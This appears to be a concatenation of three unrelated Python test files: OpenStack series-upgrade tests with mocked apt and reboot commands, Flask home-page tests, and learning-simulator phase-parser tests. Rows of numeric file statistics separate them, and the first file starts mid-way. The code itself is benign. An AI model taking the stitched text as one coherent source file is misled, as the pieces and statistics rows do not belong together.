@mock.patch.object(upgrade_utils, 'remove_confdef_file')
@mock.patch.object(
upgrade_utils.series_upgrade_utils, 'async_complete_series_upgrade')
@mock.patch.object(upgrade_utils, 'reboot')
@mock.patch.object(upgrade_utils, 'async_do_release_upgrade')
@mock.patch.object(upgrade_utils, 'async_dist_upgrade')
async def test_series_upgrade_machine(
self,
mock_async_dist_upgrade,
mock_async_do_release_upgrade,
mock_reboot,
mock_async_complete_series_upgrade,
mock_remove_confdef_file,
mock_add_confdef_file
):
await upgrade_utils.series_upgrade_machine(
'1',
post_upgrade_functions=None,
pre_upgrade_functions=None,
files=None,
workaround_script=None)
mock_async_dist_upgrade.assert_called_once_with('1')
mock_async_do_release_upgrade.assert_called_once_with('1')
mock_reboot.assert_called_once_with('1')
mock_async_complete_series_upgrade.assert_called_once_with('1')
mock_remove_confdef_file.assert_called_once_with('1')
mock_add_confdef_file.assert_called_once_with('1')
@mock.patch.object(upgrade_utils, 'add_confdef_file')
@mock.patch.object(upgrade_utils, 'remove_confdef_file')
@mock.patch.object(upgrade_utils.os_utils, 'async_set_origin')
@mock.patch.object(
upgrade_utils.series_upgrade_utils, 'async_complete_series_upgrade')
@mock.patch.object(upgrade_utils, 'reboot')
@mock.patch.object(upgrade_utils, 'async_do_release_upgrade')
@mock.patch.object(upgrade_utils, 'async_dist_upgrade')
async def test_series_upgrade_machine_with_source(
self,
mock_async_dist_upgrade,
mock_async_do_release_upgrade,
mock_reboot,
mock_async_complete_series_upgrade,
mock_async_set_origin,
mock_remove_confdef_file,
mock_add_confdef_file
):
await upgrade_utils.series_upgrade_machine(
'1',
origin='openstack-origin',
application='app',
post_upgrade_functions=None,
pre_upgrade_functions=None,
files=None,
workaround_script=None)
mock_async_dist_upgrade.assert_called_once_with('1')
mock_async_do_release_upgrade.assert_called_once_with('1')
mock_reboot.assert_called_once_with('1')
mock_async_complete_series_upgrade.assert_called_once_with('1')
mock_async_set_origin.assert_called_once_with(
'app', 'openstack-origin')
mock_remove_confdef_file.assert_called_once_with('1')
mock_add_confdef_file.assert_called_once_with('1')
@mock.patch("asyncio.gather")
async def test_maybe_pause_things_primary(self, mock_gather):
async def _gather(*args):
for f in args:
await f
mock_gather.side_effect = _gather
await upgrade_utils.maybe_pause_things(
FAKE_STATUS,
['app/1', 'app/2'],
pause_non_leader_subordinate=False,
pause_non_leader_primary=True)
self.async_run_action.assert_has_calls([
mock.call('app/1', "pause", action_params={}),
mock.call('app/2', "pause", action_params={}),
])
@mock.patch("asyncio.gather")
async def test_maybe_pause_things_subordinates(self, mock_gather):
async def _gather(*args):
for f in args:
await f
mock_gather.side_effect = _gather
await upgrade_utils.maybe_pause_things(
FAKE_STATUS,
['app/1', 'app/2'],
pause_non_leader_subordinate=True,
pause_non_leader_primary=False)
self.async_run_action.assert_has_calls([
mock.call('app-hacluster/1', "pause", action_params={}),
mock.call('app-hacluster/2', "pause", action_params={}),
])
@mock.patch("asyncio.gather")
async def test_maybe_pause_things_all(self, mock_gather):
async def _gather(*args):
for f in args:
await f
mock_gather.side_effect = _gather
await upgrade_utils.maybe_pause_things(
FAKE_STATUS,
['app/1', 'app/2'],
pause_non_leader_subordinate=True,
pause_non_leader_primary=True)
self.async_run_action.assert_has_calls([
mock.call('app-hacluster/1', "pause", action_params={}),
mock.call('app/1', "pause", action_params={}),
mock.call('app-hacluster/2', "pause", action_params={}),
mock.call('app/2', "pause", action_params={}),
])
async def test_maybe_pause_things_none(self):
await upgrade_utils.maybe_pause_things(
FAKE_STATUS,
['app/1', 'app/2'],
pause_non_leader_subordinate=False,
pause_non_leader_primary=False)
self.async_run_action.assert_not_called()
async def test_add_confdef_file(self):
await upgrade_utils.add_confdef_file('1')
cmd = (
"""echo """
"""'DPkg::options { "--force-confdef"; "--force-confnew"; }' | """
"""sudo tee /etc/apt/apt.conf.d/local"""
)
self.async_run_on_machine.assert_called_once_with(
'1', cmd
)
async def test_remove_confdef_file(self):
await upgrade_utils.remove_confdef_file('1')
self.async_run_on_machine.assert_called_once_with(
'1', 'sudo rm /etc/apt/apt.conf.d/local'
)
async def test_async_do_release_upgrade(self):
await upgrade_utils.async_do_release_upgrade('1')
do_release_upgrade_cmd = (
'yes | sudo DEBIAN_FRONTEND=noninteractive '
'do-release-upgrade -f DistUpgradeViewNonInteractive')
self.async_run_on_machine.assert_called_once_with(
'1', do_release_upgrade_cmd, timeout='120m'
)
async def test_prepare_series_upgrade(self):
await upgrade_utils.prepare_series_upgrade(
'1', to_series='xenial'
)
self.async_prepare_series_upgrade.assert_called_once_with(
'1', to_series='xenial'
)
async def test_reboot(self):
await upgrade_utils.reboot('1')
self.async_run_on_machine.assert_called_once_with(
'1', 'sudo init 6 & exit'
)
async def test_async_dist_upgrade(self):
await upgrade_utils.async_dist_upgrade('1')
apt_update_command = (
"""yes | sudo DEBIAN_FRONTEND=noninteractive """
"""apt-get --assume-yes """
"""-o "Dpkg::Options::=--force-confdef" """
"""-o "Dpkg::Options::=--force-confold" dist-upgrade""")
self.async_run_on_machine.assert_has_calls([
mock.call('1', 'sudo apt-get update'),
mock.call('1', apt_update_command),
])
| 39.256158
| 79
| 0.610742
| 2,603
| 23,907
| 5.220899
| 0.095659
| 0.064459
| 0.049007
| 0.06262
| 0.803091
| 0.766593
| 0.732009
| 0.723915
| 0.70677
| 0.700736
| 0
| 0.0071
| 0.287154
| 23,907
| 608
| 80
| 39.320724
| 0.790342
| 0.042916
| 0
| 0.72119
| 0
| 0
| 0.135508
| 0.058625
| 0
| 0
| 0
| 0
| 0.104089
| 1
| 0.020446
| false
| 0
| 0.01487
| 0.001859
| 0.048327
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
026ab65d70a704acad659ec9d7adeee9facfc7bb
| 2,247
|
py
|
Python
|
tests/functional/test_recipes.py
|
bharathjinka09/flask-pytest-registration
|
d4996e9979d08ea1b1243ce297219a8c6d22c608
|
[
"BSD-2-Clause"
] | null | null | null |
tests/functional/test_recipes.py
|
bharathjinka09/flask-pytest-registration
|
d4996e9979d08ea1b1243ce297219a8c6d22c608
|
[
"BSD-2-Clause"
] | null | null | null |
tests/functional/test_recipes.py
|
bharathjinka09/flask-pytest-registration
|
d4996e9979d08ea1b1243ce297219a8c6d22c608
|
[
"BSD-2-Clause"
] | null | null | null |
"""
This file (test_recipes.py) contains the functional tests for the `recipes` blueprint.
These tests use GETs and POSTs to different URLs to check for the proper behavior
of the `recipes` blueprint.
"""
from project import create_app
def test_home_page():
"""
GIVEN a Flask application configured for testing
WHEN the '/' page is requested (GET)
THEN check that the response is valid
"""
flask_app = create_app('flask_test.cfg')
# Create a test client using the Flask application configured for testing
with flask_app.test_client() as test_client:
response = test_client.get('/')
assert response.status_code == 200
assert b"Welcome to the" in response.data
assert b"Flask User Management Example!" in response.data
assert b"Need an account?" in response.data
assert b"Existing user?" in response.data
def test_home_page_post():
"""
GIVEN a Flask application configured for testing
WHEN the '/' page is is posted to (POST)
THEN check that a '405' status code is returned
"""
flask_app = create_app('flask_test.cfg')
# Create a test client using the Flask application configured for testing
with flask_app.test_client() as test_client:
response = test_client.post('/')
assert response.status_code == 405
assert b"Flask User Management Example!" not in response.data
def test_home_page_with_fixture(test_client):
"""
GIVEN a Flask application configured for testing
WHEN the '/' page is requested (GET)
THEN check that the response is valid
"""
response = test_client.get('/')
assert response.status_code == 200
assert b"Welcome to the" in response.data
assert b"Flask User Management Example!" in response.data
assert b"Need an account?" in response.data
assert b"Existing user?" in response.data
def test_home_page_post_with_fixture(test_client):
"""
GIVEN a Flask application configured for testing
WHEN the '/' page is is posted to (POST)
THEN check that a '405' status code is returned
"""
response = test_client.post('/')
assert response.status_code == 405
assert b"Flask User Management Example!" not in response.data
| 34.045455
| 86
| 0.700935
| 323
| 2,247
| 4.758514
| 0.219814
| 0.078074
| 0.091087
| 0.113208
| 0.871178
| 0.871178
| 0.871178
| 0.861418
| 0.861418
| 0.861418
| 0
| 0.010286
| 0.221184
| 2,247
| 65
| 87
| 34.569231
| 0.868
| 0.385403
| 0
| 0.814815
| 0
| 0
| 0.1875
| 0
| 0
| 0
| 0
| 0
| 0.518519
| 1
| 0.148148
| false
| 0
| 0.037037
| 0
| 0.185185
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a0932402b85c9b687b639e6e65ebef35b906f84
| 84,677
|
py
|
Python
|
tests/test_phase.py
|
markusrobertjonsson/lesim2
|
05e171dbb7f1f4046b4363083030dfc6195f5a03
|
[
"MIT"
] | null | null | null |
tests/test_phase.py
|
markusrobertjonsson/lesim2
|
05e171dbb7f1f4046b4363083030dfc6195f5a03
|
[
"MIT"
] | 107
|
2019-04-12T13:21:08.000Z
|
2020-11-16T20:41:53.000Z
|
tests/test_phase.py
|
markusrobertjonsson/lesim2
|
05e171dbb7f1f4046b4363083030dfc6195f5a03
|
[
"MIT"
] | 9
|
2019-04-17T19:48:19.000Z
|
2020-10-25T20:12:48.000Z
|
import matplotlib.pyplot as plt
from random import choice
from .testutil import LsTestCase, run, get_plot_data
from parsing import Script
def parse(text, phase_label):
script = Script(text)
script.parse()
script_parser = script.script_parser
phase_obj = script_parser.phases.phases[phase_label]
if not phase_obj.is_parsed:
phase_obj.parse(script_parser.parameters, script_parser.variables)
return phase_obj
class TestBasic(LsTestCase):
@classmethod
def setUpClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
pass
def test_simple(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e1=10
L1 e1 | L2
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
for i in range(1, 19):
stimulus = phase.next_stimulus('b2')[0]
if i % 2 == 0:
self.assertEqual(stimulus, {'e1': 1})
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
def test_first_line(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e1=10
L2 e2 | new_trial
new_trial e1 | L2
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
for i in range(1, 19):
stimulus = phase.next_stimulus('b1')[0]
if i % 2 == 0:
self.assertEqual(stimulus, {'e1': 1}, f"{i}")
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
def test_variables(self):
text = '''
@variables nsteps: 10
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e1=nsteps
L2 e2 | new_trial
new_trial e1 | L2
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
for i in range(1, 19):
stimulus = phase.next_stimulus('b1')[0]
if i % 2 == 0:
self.assertEqual(stimulus, {'e1': 1}, f"{i}")
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
text = '''
@variables n:5
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:local_var=n
L0 local_var:0 | L1
L1 e1 | L2
L2 e2 | H1
H1 local_var:local_var+1 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
for i in range(1, 10):
stimulus = phase.next_stimulus('b2')[0]
if i % 2 == 0:
self.assertEqual(stimulus, {'e1': 1})
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
self.assertEqual(phase.local_variables.values['local_var'], 5)
def test_local_variable_in_stop(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:local_var=5
L0 local_var:0 | L1
L1 e1 | L2
L2 e2 | H1
H1 local_var:local_var+1 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(1, 10):
stimulus = phase.next_stimulus('b2')[0]
if i % 2 == 0:
self.assertEqual(stimulus, {'e1': 1})
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
self.assertEqual(phase.local_variables.values['local_var'], 5)
def test_line_label_in_stop(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:L1=10
L1 e1 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
for _ in range(1, 10):
stimulus = phase.next_stimulus('b1')[0]
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
class TestInheritance(LsTestCase):
def setUp(self):
pass
def test_simple(self):
text = '''
stimulus_elements: e1, e2, e3
behaviors: b1, b2
@PHASE foo stop:L1=5
L1 e1 | L2
L2 e2 | L1
@PHASE bar(foo) stop:e1=3
L2 e3 | L1
xscale: all # Just to finish the parsing of bar
'''
phase = parse(text, 'bar')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
text = '''
stimulus_elements: e1, e2, e3
behaviors: b1, b2
@PHASE foo stop:L1=5
L1 e1 | L2
L2 e2 | L1
@PHASE bar(foo) stop:e3=3
L1 e3 | L2
xscale: all # Just to finish the parsing of bar
'''
phase = parse(text, 'bar')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e3': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
def test_multiple_space(self):
text = '''
stimulus_elements: e1, e2, e3
behaviors: b1, b2
@PHASE foo stop:L1=5
L1 e1 | L2
L2 e2 | L1
@PHASE bar(foo) stop : e3 = 3
L1 e3 | L2
xscale: all # Just to finish the parsing of bar
'''
phase = parse(text, 'bar')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e3': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
def test_wrong_parent_name(self):
text = '''
stimulus_elements: e1, e2, e3
behaviors: b1, b2
@PHASE foo stop:L1=5
L1 e1 | L2
L2 e2 | L1
@PHASE bar(foofel) stop:e1=3
L2 e3 | L1
xscale: all # Just to finish the parsing of bar
'''
msg = "Invalid phase label 'foofel'."
with self.assertRaisesMsg(msg):
parse(text, 'bar')
def test_wrong_child_name(self):
text = '''
stimulus_elements: e1, e2, e3
behaviors: b1, b2
@PHASE foo stop:L1=5
L1 e1 | L2
L2 e2 | L1
@PHASE foo(foo) stop:e1=3
L2 e3 | L1
xscale: all # Just to finish the parsing of bar
'''
msg = "Redefinition of phase 'foo'."
with self.assertRaisesMsg(msg):
parse(text, 'bar')
def test_wrong_syntax(self):
text = '''
stimulus_elements: e1, e2, e3
behaviors: b1, b2
@PHASE foo stop:L1=5
L1 e1 | L2
L2 e2 | L1
@PHASE bar (foo) stop:e1=3
L2 e3 | L1
xscale: all # Just to finish the parsing of bar
'''
msg = "Phase stop condition must have the form 'stop:condition'."
with self.assertRaisesMsg(msg):
parse(text, 'bar')
def test_wrong_parentheses1(self):
text = '''
stimulus_elements: e1, e2, e3
behaviors: b1, b2
@PHASE foo stop:L1=5
L1 e1 | L2
L2 e2 | L1
@PHASE bar((foo)) stop:e1=3
L2 e3 | L1
xscale: all # Just to finish the parsing of bar
'''
msg = "Invalid phase label '(foo)'."
with self.assertRaisesMsg(msg):
parse(text, 'bar')
def test_wrong_parentheses2(self):
text = '''
stimulus_elements: e1, e2, e3
behaviors: b1, b2
@PHASE foo stop:L1=5
L1 e1 | L2
L2 e2 | L1
@PHASE bar(foo)baz stop:e1=3
L2 e3 | L1
xscale: all # Just to finish the parsing of bar
'''
msg = "Phase label 'bar(foo)baz' is not a valid identifier."
with self.assertRaisesMsg(msg):
parse(text, 'bar')
def test_wrong_parentheses3(self):
text = '''
stimulus_elements: e1, e2, e3
behaviors: b1, b2
@PHASE foo stop:L1=5
L1 e1 | L2
L2 e2 | L1
@PHASE barbazfoo) stop:e1=3
L2 e3 | L1
xscale: all # Just to finish the parsing of bar
'''
msg = "Phase label 'barbazfoo)' is not a valid identifier."
with self.assertRaisesMsg(msg):
parse(text, 'bar')
def test_reference_to_undefined_local_variable(self):
text = '''
stimulus_elements: e1, e2, par1, par2
behaviors: b1, b2
# Squeeze in a little test of inheritance
@PHASE parent stop:local_var2=5
L0 local_var2:9 | L2
L1 par1 | L1
L2 par2,par1 | L1
H1 local_var2:local_var2+1 | H1
@PHASE phase_label(parent) stop:local_var=5
L0 | L1
L1 e1 | L2
L2 e2 | H1
H1 local_var:local_var+1 | L1
beta: 1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
msg = "Unknown variable 'local_var'."
with self.assertRaisesMsg(msg):
stimulus = phase.next_stimulus('b2')[0]
class TestHelpLine(LsTestCase):
def setUp(self):
pass
def test_no_action(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e1=10
L1 e1 | H1
H1 | L2
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
for i in range(1, 19):
stimulus = phase.next_stimulus('b1')[0]
if i % 2 == 0:
self.assertEqual(stimulus, {'e1': 1})
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e1=10
L1 e1 | H1
H1 | H2
H2 | L2
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
for i in range(1, 19):
stimulus = phase.next_stimulus('b1')[0]
if i % 2 == 0:
self.assertEqual(stimulus, {'e1': 1})
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
def test_ignore_response_increment(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:b1=5
L1 e1 | H1
H1 | L2
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0] # First stimulus
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNotNone(stimulus) # Now count(b1) is 6
# With two consecutive help lines
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:b1=5
L1 e1 | H1
H1 | H2
H2 x:0 | L2
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0] # First stimulus
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNotNone(stimulus) # Now count(b1) is 6
# With two consecutive help lines
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:b1=5
L1 e1 | H1
H1 | H2
H2 x:0 | L2
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0] # First stimulus
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNotNone(stimulus) # Now count(b1) is 6
def test_count_in_logic(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e2=1
L1 e1 | count(e1)=5 : L3 | L2
L2 e1 | L1
L3 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0] # First stimulus
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
def test_count_reset(self):
# Reset a stimulus element
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e2=3
L1 e1 | count(e1)=5 : H | L2
L2 e1 | L1
H count_reset(e1) | L3
L3 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
for _ in range(1, 5):
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
for _ in range(5):
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
for _ in range(5):
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
# Reset a behavior
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:False # Never stop
L1 e1 | count(b1)>=5 : H | L2
L2 e1 | L1
H count_reset(b1) | L3
L3 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0] # First stimulus
self.assertEqual(stimulus, {'e1': 1})
for i in range(2, 100):
stimulus = phase.next_stimulus('b1')[0]
if i % 6 == 0:
self.assertEqual(stimulus, {'e2': 1})
else:
self.assertEqual(stimulus, {'e1': 1})
# Reset a line label
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:L1=10 # L1 will never be 10
L1 e1 | L1=5:H | L1
H count_reset(L1) | L2
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
first = True
for _ in range(1, 10):
for i in range(5):
if first:
stimulus = phase.next_stimulus(None)[0]
first = False
else:
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
# Reset a line label
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:XH=10
XL1 e1 | count(XL1)=5 : XH | XL2
XL2 e1 | XL1
XH count_reset(XL1) | XL3
XL3 e2 | XL1
'''
phase = parse(text, 'phase_label')
first = True
for i in range(1, 100):
if first:
stimulus = phase.next_stimulus(None)[0]
first = not first
else:
stimulus = phase.next_stimulus('b1')[0]
if i % 10 == 0:
self.assertEqual(stimulus, {'e2': 1})
else:
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
def test_count_line(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e2=5
L1 e1 | count_line(b1)=3 : L2 | L1
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for _ in range(42):
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
for _ in range(42):
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
# Test same thing but with count(b1)=3 instead of count_line(b1)=3
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e2=5
L1 e1 | count(b1)==3 : L2 | L1
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for _ in range(42):
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
for _ in range(42):
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
def test_count_line_noarg(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e2=5
L1 e1 | count_line()=3 : L2 | L1
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e2=2
L1 e1 | count_line(L1)=3 : L2 | L1
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertIsNone(stimulus)
def test_multiple_actions1(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2
@PHASE phase_label stop:e1=10
A e1 | p1:1, p2:2, B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, {'p1': 1, 'p2': 2})
def test_multiple_actions2(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2, e3
@PHASE phase_label stop:e1=10
S | x1 = 0, x2 = 0, A
A e1 | b1: x1:x1+1, x2:2, B | C
B e2 | A
C e3 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, {'x1': 0, 'x2': 0})
